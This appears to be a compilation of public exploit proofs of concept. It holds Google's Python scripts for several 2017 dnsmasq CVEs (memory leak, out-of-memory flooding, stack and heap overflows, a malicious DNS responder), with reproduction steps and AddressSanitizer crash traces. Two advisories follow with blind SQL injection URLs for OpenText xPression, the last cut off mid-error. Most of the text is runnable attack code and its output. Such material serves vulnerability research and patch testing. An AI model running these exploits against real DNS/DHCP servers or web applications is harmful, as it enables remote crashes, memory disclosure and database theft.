Sadly, there are no easy docker setup instructions available.
Set up a simple network with dnsmasq as the dhcpv6 server. Run any dhcpv6 client on the client machine and capture the network packets. Look for the server identifier inside the dhcpv6 packets. Then, run the poc on the client:
# python /poc.py <ipv6 addr> <server id, hexencoded>
The poc will create a response.bin file with 32k bytes worth of ram, beginning at the buffer + 38.
'''
#!/usr/bin/env python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
from binascii import unhexlify
from struct import pack
import socket
import sys
# num bytes to leak. < 0xFFFF, exact upper limit not tested.
N_BYTES = 0x8000
def send_packet(data, host, port):
print("[+] sending {} bytes to [{}]:{}".format(len(data), host, port))
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
if s.sendto(data, (host, port)) != len(data):
print("[!] Could not send (full) payload")
s.close()
def u8(x):
    """Encode *x* as a single unsigned byte (struct format ``B``)."""
    encoded = pack("B", x)
    return encoded
def u16(x):
    """Encode *x* as a 2-byte unsigned integer in network byte order (``!H``)."""
    network_short = pack("!H", x)
    return network_short
def gen_option(option, data, length=None):
    """Serialise one option as a 2-byte code, a 2-byte length field, then *data*.

    When *length* is omitted, the length field is ``len(data)``. An explicit
    *length* is written as given and is never compared with the real size of
    *data*, so the declared and actual sizes can disagree. A parser receiving
    such an option has to bound the declared length against the bytes that
    are actually present before copying or replying.
    """
    declared = len(data) if length is None else length
    header = u16(option) + u16(declared)
    return b"".join([header, data])
def inner_pkg(duid):
OPTION6_SERVER_ID = 2
return b"".join([
u8(5), # Type = DHCP6RENEW
u8(0), u16(1337), # ID
gen_option(OPTION6_SERVER_ID, duid),
gen_option(1, "", length=(N_BYTES - 8 - 18)) # Client ID
])
if __name__ == '__main__':
assert len(sys.argv) == 2, "{} <ip> <duid>".format(sys.argv[0])
# No automated way to obtain a duid, sorry. Not a programming contest after all.
host, duid = sys.argv[1:]
duid = unhexlify(duid)
assert len(duid) == 14
pkg = b"".join([
u8(12), # DHCP6RELAYFORW
'?',
# Client addr
'\xFD\x00',
'\x00\x00' * 6,
'\x00\x05',
'_' * (33 - 17), # Skip random data.
# Option 9 - OPTION6_RELAY_MSG
gen_option(9, inner_pkg(duid), length=N_BYTES),
])
# Setup receiving port
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, N_BYTES)
s.bind(('::', 547))
# Send request
send_packet(pkg, host, 547)
# Dump response
with open('response.bin', 'wb') as f:
f.write(s.recvfrom(N_BYTES)[0])
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14495.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
dnsmasq is vulnerable only if one of the following options is specified: --add-mac, --add-cpe-id or --add-subnet.
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
import socket
import sys
def oom():
data = '''01 0d 08 1b 00 01 00 00 00 00 00 02 00 00 29 04
00 00 29 00 00 00 03 00 00 01 13 00 08 01 13 79
00 00 00 00 00
'''.replace(' ', '').replace('\n', '').decode('hex')
data = data.replace('\x00\x01\x13\x00', '\x7f\x00\x00\x01')
return data
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <ip> <port>' % sys.argv[0]
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
packet = oom()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
while True:
s.sendto(packet, (ip, port))
#break
s.close()
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14493.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
1) Build the docker and open two terminals
docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it <container_id> bash
2) On one terminal start dnsmasq:
# /test/dnsmasq_noasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq-dhcp: DHCPv6, IP range fd00::2 -- fd00::ff, lease time 1h
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: using nameserver 8.8.4.4#53
dnsmasq: read /etc/hosts - 7 addresses
3) On another terminal start the PoC:
# python /poc.py ::1 547
[+] sending 70 bytes to ::1:547
4) Dnsmasq will output the following: Segmentation fault (core dumped)
==33==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffcbef81470 at pc 0x0000004b5408 bp 0x7ffcbef81290 sp 0x7ffcbef80a40
WRITE of size 30 at 0x7ffcbef81470 thread T0
#0 0x4b5407 in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b5407)
#1 0x575d38 in dhcp6_maybe_relay /test/dnsmasq/src/rfc3315.c:211:7
#2 0x575378 in dhcp6_reply /test/dnsmasq/src/rfc3315.c:103:7
#3 0x571080 in dhcp6_packet /test/dnsmasq/src/dhcp6.c:233:14
#4 0x544a82 in main /test/dnsmasq/src/dnsmasq.c:1061:2
#5 0x7f93e5da62b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
Address 0x7ffcbef81470 is located in stack of thread T0 at offset 208 in frame
#0 0x57507f in dhcp6_reply /test/dnsmasq/src/rfc3315.c:78
This frame has 1 object(s):
[32, 208) 'state' <== Memory access at offset 208 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/test/dnsmasq/src/dnsmasq+0x4b5407) in __asan_memcpy
Shadow bytes around the buggy address:
0x100017de8230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de8240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de8250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de8260: f1 f1 f1 f1 00 00 f3 f3 00 00 00 00 00 00 00 00
0x100017de8270: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00
=>0x100017de8280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f3]f3
0x100017de8290: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00
0x100017de82a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de82b0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
0x100017de82c0: 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2
0x100017de82d0: 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==33==ABORTING
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
from struct import pack
import sys
import socket
def send_packet(data, host, port):
    """Send *data* as a single UDP datagram over IPv6 to (*host*, *port*).

    Prints the payload size and destination first, and a warning when
    ``sendto`` reports fewer bytes than ``len(data)``. The socket is closed
    on the normal path.
    """
    size = len(data)
    print("[+] sending {} bytes to {}:{}".format(size, host, port))
    sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    # Ask for a send buffer sized to the payload.
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, size)
    sent = sock.sendto(data, (host, port))
    if sent != size:
        print("[!] Could not send (full) payload")
    sock.close()
def u8(x):
    """Encode *x* as one unsigned byte (struct format ``B``)."""
    encoded = pack("B", x)
    return encoded
def u16(x):
    """Encode *x* as an unsigned 16-bit integer in network (big-endian) byte order."""
    encoded = pack("!H", x)
    return encoded
def gen_option(option, data, length=None):
    """Serialize one option as code, length, then payload.

    The option code and the length are each written with ``u16`` (two bytes,
    network order) and *data* is appended unchanged. *length* defaults to
    ``len(data)``; passing any other value makes the declared length disagree
    with the bytes that follow.
    """
    declared = len(data) if length is None else length
    fields = (u16(option), u16(declared), data)
    return b"".join(fields)
# Entry point: build one DHCPv6 relay-forward message carrying an oversized
# option 79 and send it to <ip> <port>.
# Review note: the option data below is 74 + 8 = 82 bytes, while the author's
# comment names a 16-byte destination buffer; the defence is a length check on
# the receiving side before that copy.
if __name__ == '__main__':
    # Argument check via assert: it is skipped entirely when Python runs with -O.
    assert len(sys.argv) == 3, "{} <ip> <port>".format(sys.argv[0])
    pkg = b"".join([
        u8(12), # DHCP6RELAYFORW
        u16(0x0313), u8(0x37), # transaction ID
        # 30 filler bytes.
        # NOTE(review): presumably pads the message out to a 34-byte relay
        # header (4 bytes are already written above) -- confirm.
        b"_" * (34 - 4),
        # Option 79 = OPTION6_CLIENT_MAC
        # Moves argument into char[DHCP_CHADDR_MAX], DHCP_CHADDR_MAX = 16
        # The str + pack() concatenation assumes Python 2 string semantics.
        gen_option(79, "A" * 74 + pack("<Q", 0x1337DEADBEEF)),
    ])
    host, port = sys.argv[1:]
    send_packet(pkg, host, int(port))
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14492.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
1) Build the docker and open two terminals
docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it <container_id> bash
2) On one terminal start dnsmasq:
# /test/dnsmasq_noasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff --enable-ra
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq-dhcp: DHCPv6, IP range fd00::2 -- fd00::ff, lease time 1h
dnsmasq-dhcp: router advertisement on fd00::
dnsmasq-dhcp: IPv6 router advertisement enabled
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: using nameserver 8.8.4.4#53
dnsmasq: read /etc/hosts - 7 addresses
3) On another terminal start the PoC:
# python /poc.py ::1 547
[+] sending 2050 bytes to ::1
4) Dnsmasq will output the following: Segmentation fault (core dumped)
==556==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61900000ea81 at pc 0x00000049628a bp 0x7ffd60a28a20 sp 0x7ffd60a281d0
WRITE of size 4 at 0x61900000ea81 thread T0
#0 0x496289 in __interceptor_vsprintf (/test/dnsmasq/src/dnsmasq+0x496289)
#1 0x4964d2 in __interceptor_sprintf (/test/dnsmasq/src/dnsmasq+0x4964d2)
#2 0x519538 in print_mac /test/dnsmasq/src/util.c:593:12
#3 0x586e6a in icmp6_packet /test/dnsmasq/src/radv.c:201:4
#4 0x544af4 in main /test/dnsmasq/src/dnsmasq.c:1064:2
#5 0x7f0d52e312b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
0x61900000ea81 is located 0 bytes to the right of 1025-byte region [0x61900000e680,0x61900000ea81)
allocated by thread T0 here:
#0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
#1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
#2 0x51cb14 in read_opts /test/dnsmasq/src/option.c:4615:16
#3 0x541783 in main /test/dnsmasq/src/dnsmasq.c:89:3
#4 0x7f0d52e312b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/test/dnsmasq/src/dnsmasq+0x496289) in __interceptor_vsprintf
Shadow bytes around the buggy address:
0x0c327fff9d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c327fff9d50:[01]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==556==ABORTING
'''
#!/usr/bin/env python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
from struct import pack
import socket
import sys
# ICMPv6 message type written as the first byte of the packet built below.
ND_ROUTER_SOLICIT = 133
# Option type byte that follows the 8-byte ICMPv6 header in the packet built below.
ICMP6_OPT_SOURCE_MAC = 1
def u8(x):
    """Encode *x* as one unsigned byte (struct format ``B``)."""
    encoded = pack("B", x)
    return encoded
def send_packet(data, host):
    """Send *data* to *host* through a raw ICMPv6 socket.

    Prints the payload size and destination first, and a warning when
    ``sendto`` reports fewer bytes than ``len(data)``. The socket is closed
    on the normal path. The destination port passed to ``sendto`` is 0.
    """
    size = len(data)
    print("[+] sending {} bytes to {}".format(size, host))
    sock = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)
    # Ask for a send buffer sized to the payload.
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, size)
    sent = sock.sendto(data, (host, 0))
    if sent != size:
        print("[!] Could not send (full) payload")
    sock.close()
# Entry point: build one ICMPv6 router-solicitation message whose source-MAC
# option declares the maximum length, and send it to <IPv6>.
# The message is 8 + 2 + 255 * 8 = 2050 bytes, matching the "sending 2050
# bytes" line in the write-up above; that write-up's ASan trace reports a
# heap-buffer-overflow in print_mac (util.c:593) reached from icmp6_packet.
# Review note: the defence is for the receiver to bound the option length
# against its output buffer before formatting the address.
if __name__ == '__main__':
    # Argument check via assert: it is skipped entirely when Python runs with -O.
    assert len(sys.argv) == 2, "Run via {} <IPv6>".format(sys.argv[0])
    host, = sys.argv[1:]
    pkg = b"".join([
        u8(ND_ROUTER_SOLICIT), # type
        u8(0), # code
        b"X" * 2, # checksum (placeholder bytes)
        b"\x00" * 4, # reserved
        u8(ICMP6_OPT_SOURCE_MAC), # option type: source MAC
        # Option length byte set to 255.
        # NOTE(review): the length is presumably counted in 8-byte units,
        # which is why 255 * 8 bytes follow -- confirm.
        u8(255),
        b"A" * 255 * 8,
    ])
    send_packet(pkg, host)
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14491.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
1) Build the docker and open three terminals
docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it <container_id> bash
docker exec -it <container_id> bash
2) On one terminal let’s launch attacker controlled DNS server:
# python poc.py 127.0.0.2 53
Listening at 127.0.0.2:53
3) On another terminal let’s launch dnsmasq forwarding queries to attacker controlled DNS:
# /testing/dnsmasq/src/dnsmasq -p 53535 --no-daemon --log-queries -S 127.0.0.2 --no-hosts --no-resolv
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq: using nameserver 127.0.0.2#53
dnsmasq: cleared cache
4) Let’s fake a client making a request twice (or more) so we hit the dnsmasq cache:
# dig @localhost -p 53535 -x 8.8.8.125 > /dev/null
# dig @localhost -p 53535 -x 8.8.8.125 > /dev/null
5) The crash might not be triggered on the first try due to the non-deterministic order of the dnsmasq cache. Restarting dnsmasq and retrying should be sufficient to trigger a crash.
==1159==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62200001dd0b at pc 0x0000005105e7 bp 0x7fff6165b9b0 sp 0x7fff6165b9a8
WRITE of size 1 at 0x62200001dd0b thread T0
#0 0x5105e6 in add_resource_record /test/dnsmasq/src/rfc1035.c:1141:7
#1 0x5127c8 in answer_request /test/dnsmasq/src/rfc1035.c:1428:11
#2 0x534578 in receive_query /test/dnsmasq/src/forward.c:1439:11
#3 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2
#4 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7
#5 0x7fdf4b3972b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
0x62200001dd0b is located 0 bytes to the right of 5131-byte region [0x62200001c900,0x62200001dd0b)
allocated by thread T0 here:
#0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
#1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
#2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20
#3 0x7fdf4b3972b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: heap-buffer-overflow /test/dnsmasq/src/rfc1035.c:1141:7 in add_resource_record
Shadow bytes around the buggy address:
0x0c447fffbb50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c447fffbba0: 00[03]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1159==ABORTING
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
import socket
import struct
import sys
def dw(x):
    """Encode *x* as an unsigned 16-bit big-endian integer (two bytes)."""
    encoded = struct.pack('>H', x)
    return encoded
def udp_handler(sock_udp):
    """Answer one UDP DNS query with a fixed, oversized PTR response.

    Reads one datagram (up to 1024 bytes), copies its 16-bit query ID and
    ignores the rest of the query: the question section and all 0x52 (82)
    answers are hard-coded. The response is sent back to the sender.

    Review note: the write-up above pairs this responder with a dnsmasq that
    forwards to it; the ASan trace there reports a heap-buffer-overflow WRITE
    in add_resource_record (rfc1035.c:1141) reached from answer_request after
    the same name is queried twice. The defence is on the resolver side:
    bound every record written into the reply buffer.
    """
    data, addr = sock_udp.recvfrom(1024)
    print '[UDP] Total Data len recv ' + str(len(data))
    # Query ID, echoed back so the forwarder accepts the reply.
    # (The local name shadows the builtin id().)
    id = struct.unpack('>H', data[0:2])[0]
    # Everything after the 12-byte header; not used below.
    query = data[12:]
    data = dw(id) # id
    data += dw(0x85a0) # flags
    data += dw(1) # questions
    data += dw(0x52) # answers (1 + 1 + 79 + 1 records below)
    data += dw(0) # authoritative
    data += dw(0) # additional
    # Add the question back - we're just hardcoding it
    # (125.8.8.8.in-addr.arpa, the name "dig -x 8.8.8.125" asks for in the write-up)
    data += ('\x03125\x018\x018\x018\x07in-addr\x04arpa\x00' +
             '\x00\x0c' + # type = 'PTR'
             '\x00\x01') # cls = 'IN'
    # Add the first answer: 16 labels of 62 bytes plus one of 14 bytes and the
    # terminator, 0x0400 (1024) bytes of record data in total
    data += ('\xc0\x0c' + # ptr to the name
             '\x00\x0c' + # type = 'PTR'
             '\x00\x01' + # cls = 'IN'
             '\x00\x00\x00\x3d' + # ttl
             '\x04\x00' + # size of this resource record
             '\x3e' + 'Z'*62 +
             '\x3e' + 'Z'*62 +
             '\x3e' + 'Z'*62 +
             '\x3e' + 'Z'*62 +
             '\x3e' + 'Z'*62 +
             '\x3e' + 'Z'*62 +
             '\x3e' + 'Z'*62 +
             '\x3e' + 'Z'*62 +
             '\x3e' + 'Z'*62 +
             '\x3e' + 'Z'*62 +
             '\x3e' + 'Z'*62 +
             '\x3e' + 'Z'*62 +
             '\x3e' + 'Z'*62 +
             '\x3e' + 'Z'*62 +
             '\x3e' + 'Z'*62 +
             '\x3e' + 'Z'*62 +
             '\x0e' + 'Z'*14 +
             '\x00')
    # Add the next answer, which is written out in full
    data += ('\xc0\x0c' + # ptr to the name
             '\x00\x0c' + # type = 'PTR'
             '\x00\x01' + # cls = 'IN'
             '\x00\x00\x00\x3d' + # ttl
             '\x00\x26' + # size of this resource record
             '\x08DCBBEEEE\x04DDDD\x08CCCCCCCC\x04AAAA\x04BBBB\x03com\x00')
    # 79 further answers, each only a 2-byte compression pointer
    for _ in range(79):
        data += ('\xc0\x0c' + # ptr to the name
                 '\x00\x0c' + # type = 'PTR'
                 '\x00\x01' + # cls = 'IN'
                 '\x00\x00\x00\x3d' + # ttl
                 '\x00\x02' + # size of the compressed resource record
                 '\xc4\x40') # pointer to the second record's name
    # Final answer: two literal labels followed by a compression pointer
    data += ('\xc0\x0c' + # ptr to the name
             '\x00\x0c' + # type = 'PTR'
             '\x00\x01' + # cls = 'IN'
             '\x00\x00\x00\x3d' + # ttl
             '\x00\x11' + # size of this resource record
             '\x04EEEE\x09DAABBEEEE\xc4\x49')
    sock_udp.sendto(data, addr)
# Entry point: bind a UDP socket on <ip>:<port> and answer every datagram with
# udp_handler(). The write-up above runs this as the upstream server of a test
# dnsmasq instance.
if __name__ == '__main__':
    if len(sys.argv) != 3:
        print 'Usage: %s <ip> <port>\n' % sys.argv[0]
        # A usage error still exits with status 0.
        sys.exit(0)
    ip = sys.argv[1]
    port = int(sys.argv[2])
    sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock_udp.bind((ip, port))
    print 'Listening at %s:%d\n' % (ip, port)
    while True:
        udp_handler(sock_udp)
    # Not reached on the normal path: the loop above has no exit.
    sock_udp.close()
Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14758
Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)
Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)
SQL Injection:
==============
Because the application does not use prepared statements, it is prone to SQL
injection attacks.
An attacker can retrieve data from the application database by
exploiting the issue.
Vector :
--------
https://[...]/xAdmin/html/cm_doclist_view_uc.jsp?cat_id=503&documentId=185365177756%20and%201=1&documentType=xDesignPublish&documentName=ContractRealEstate
^
Results can be retrieved using blind SQL injection method.
Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
Contact:
========
mw[at]nme[dot]pl
Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14757
Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)
Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)
SQL Injection:
==============
Because the application does not use prepared statements, it is prone to SQL
injection attacks.
An attacker can retrieve data from the application database by
exploiting the issue.
Vector :
--------
True: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1
False: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2
Additionally:
http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa
Results in the following error in response:
HTTP/1.1 200 OK
[...]
<b>Errors: </b>
See nested exception; nested exception is:
java.lang.RuntimeException:
com.dsc.uniarch.cr.error.CRException: CRReportingSL: Method
getJobRunsByIds did not succeed because of a database operation
failure.;
	---> nested com.dsc.uniarch.cr.error.CRSyntaxException:
Database syntax error :SELECT JOBRUN_ID, JOB_NAME,
PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION,
DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID
